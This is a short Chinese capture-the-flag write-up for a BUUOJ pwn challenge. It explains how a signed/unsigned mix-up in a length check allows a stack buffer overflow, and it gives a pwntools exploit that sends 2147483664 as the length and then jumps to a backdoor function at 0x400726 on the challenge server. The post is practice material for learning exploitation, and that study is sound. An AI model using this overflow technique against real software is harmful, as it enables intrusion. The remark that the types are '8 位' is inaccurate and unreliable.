共计 475 个字符,预计需要花费 2 分钟才能阅读完成。
提醒:本文最后更新于 2024-08-30 14:47,文中所关联的信息可能已发生改变,请知悉!
checksec
IDA
有两个输入点,先输入 nbytes,如果nbytes 不大于 10,那么可以输入 buf,但buf 的长度由 nbytes 大小决定
这题的知识点在于 nbytes 前后的数据类型是不同的,两个都是 8 位,但 signed int 的第一位代表正负,而 unsigned int 不带符号,所以可以利用这个漏洞,将可输入长度扩大到可以利用的范围,如下图:
80000010 在 signed int 中是个负数,但在 unsigned int 中等于十进制的 2147483664,足够我们进行溢出
此外,我们还发现一个后门函数:
EXP
from pwn import *
p = remote('node4.buuoj.cn', 28327)
payload = b'a' * (0x10 + 0x8) + p64(0x400726)
p.sendlineafter('name:\n', '2147483664')
p.sendlineafter('name?\n', payload)
p.interactive()结果
正文完
